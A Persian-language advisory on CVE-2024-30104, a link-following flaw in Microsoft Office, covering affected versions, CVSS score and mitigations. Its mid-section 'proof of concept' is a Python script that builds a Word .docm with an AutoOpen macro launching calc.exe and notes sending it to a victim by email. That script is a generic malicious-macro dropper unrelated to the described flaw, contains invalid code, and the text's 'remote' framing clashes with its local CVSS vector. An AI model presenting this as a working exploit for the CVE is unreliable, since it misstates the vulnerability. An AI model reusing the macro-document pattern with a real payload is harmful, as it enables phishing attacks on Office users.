- شناسه CVE-2024-30104 :CVE
- CWE59 :CWE
- yes :Advisory
- منتشر شده: 06/11/2024
- به روز شده: 07/19/2024
- امتیاز: 7.8
- نوع حمله: Unknown
- اثر گذاری: Remote Code Execution
- برند: Microsoft
- محصول: Microsoft 365 Apps for Enterprise /Microsoft Office 2019/Microsoft Office LTSC 2021/Microsoft Office 2016
- وضعیتPublished :CVE
- Yes :POC
- وضعیت آسیب پذیری: patch شده
چکیده
کردن یک آسیبپذیری حیاتی با عناون، CVE-2024-30104 شناسایی شده است که مجموعه مایکروسافت آفیس را هدف قرار میدهد و به مهاجم اجازه میدهد تا کد دلخواه را از راه دور بر روی سیستم قربانی اجرا کند. این آسیبپذیری اجرای کد از راه دور (RCE) میتواند حریم خصوصی و امنیت میلیونها کاربر را در سراسر جهان به خطر بیاندازد.
لیست محصولات آسیب پذیر
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for 64-bit editions
Microsoft Office 2019 for 32-bit editions
توضیحات
ایجاد تغییرات در نرم افزار با ورودی ناشناخته منجر به آسیب پذیری در یک لینک می شود. CWE مرتبط با این آسیب پذیری را می توان به عنوان CWE-59 طبقه بندی کرد. پس از استفاده از آسیب پذیری و ایجاد تغیرات در نرم افزار به جهت مخرب سازی آن، حال می توان ملاحظه کرد که فایل موردنظر به فایلی بر اساس نام فایل دسترسی پیدا می کند، اما به درستی از شناسایی لینک یا میانبری که به یک منبع ناخواسته اتصال می یاید، جلوگیری نمی کند. این امر بر محرمانگی، یکپارچگی و در دسترس بودن تأثیر خواهد گذاشت. این مستلزم آن است که قربانی نوعی تعامل با کاربر را انجام دهد. در حقیقت یک مهاجم باید یک فایل مخرب را برای قربانی ارسال کند و او را متقاعد کند که آن را باز کند.
مهاجمی که با موفقیت از این آسیبپذیری سوء استفاده کند، توانایی اجرای کدهای مخرب را از راه دور با سطح دسترسی کاربر را به دست آورده و می تواند به طور بالقوه کنترل کامل سیستم قربانی را در دست بگیرد. سپس مهاجم میتواند نرمافزارهای مخرب را نصب کند، در دادهها تغییرات ایجاد کند یا حسابهای کاربری جدیدی با سطح دسترسی مدیریتی ایجاد کند.
یک قطعه کد اثبات مفهوم (PoC) در زیر ارائه شده است تا نشان دهد چگونه یک مهاجم می تواند از این آسیب پذیری استفاده کند:
// Import necessary libraries and functions
import os, subprocess, sys
import win32com.client
def create_malicious_file(malicious_code):
# Create a new Word document
word = win32com.client.Dispatch(‘Word.Application’)
word.Visible = False
doc = word.Documents.Add()
# Insert the malicious code
doc.Range(,).InsertBefore(malicious_code)
# Save and close the document
doc.SaveAs(“malicious.docm”)
doc.Close()
word.Quit()
def main():
# Craft malicious VBA code
malicious_code = ”’
Sub AutoOpen()
Dim obj As Object
Set obj = CreateObject(“WScript.Shell”)
obj.Run “calc.exe”
End Sub
”’
# Create a malicious Word document
create_malicious_file(malicious_code)
# Send the malicious document to the target user via email (insert your custom email function)
if __name__ == “__main__”:
main()
این قطعه کد یک مثال ساده از ایجاد یک سند Microsoft Word مخرب (با پسوند ‘.docm’) حاوی کد ماکرو VBA را نشان می دهد که برنامه ماشین حساب ویندوز (calc.exe) را پس از باز کردن راه اندازی می کند. یک مهاجم میتواند این سند را از طریق ایمیل یا روشهای دیگر برای قربانیان ناشناس ارسال کند و با باز کردن سند، کد مخرب اجرا شود.
CVSS
| Score | Severity | Version | Vector String | ||
| 7.8 | HIGH | 3.1 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C | ||
نتیجه گیری
برای محافظت سیستم خود در برابر CVE-2024-30104، کاربران و مدیران باید اطمینان حاصل کنند که مایکروسافت آفیس با آخرین بروزرسانی های امنیتی به روز شده است. مایکروسافت این آسیبپذیری را پذیرفته و نسخه جدیدی منتشر کرده است که به طور موثر این مشکل را کاهش میدهد. علاوه بر اعمال بروزرسانی امنیتی، کاربران باید به موارد زیر توجه کنند:
– غیرفعال کردن ماکروها: تنظیمات مایکروسافت آفیس را برای غیرفعال کردن اجرای خودکار ماکروها پیکربندی کنید. این کار حمله مربوط به این آسیب پذیری را محدود می کند.
– کاربران را نسبت به موارد امنیتی بیان شده و آسیب پذیری موجود آگاه کنید: به کاربران در مورد خطرات باز کردن فایل ها و فعال کردن ماکروها از منابع ناشناخته یا نامعتبر برای کمک به کاهش خطر اکسپلویت آموزش دهید.
– فعال کردن محافظ های سیستم: اطمینان حاصل کنید که آنتی ویروس و سایر نرم افزارهای امنیتی برای شناسایی سریع و جلوگیری از هرگونه فعالیت مخرب به روز هستند.
منابع
- https://www.cve.org/CVERecord?id=CVE-2024-30104
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30104
- https://vuldb.com/?id.268047
- https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-30104
- https://www.cve.news/cve-2024-30104/
- https://www.recordedfuture.com/vulnerability-database/CVE-2024-30104
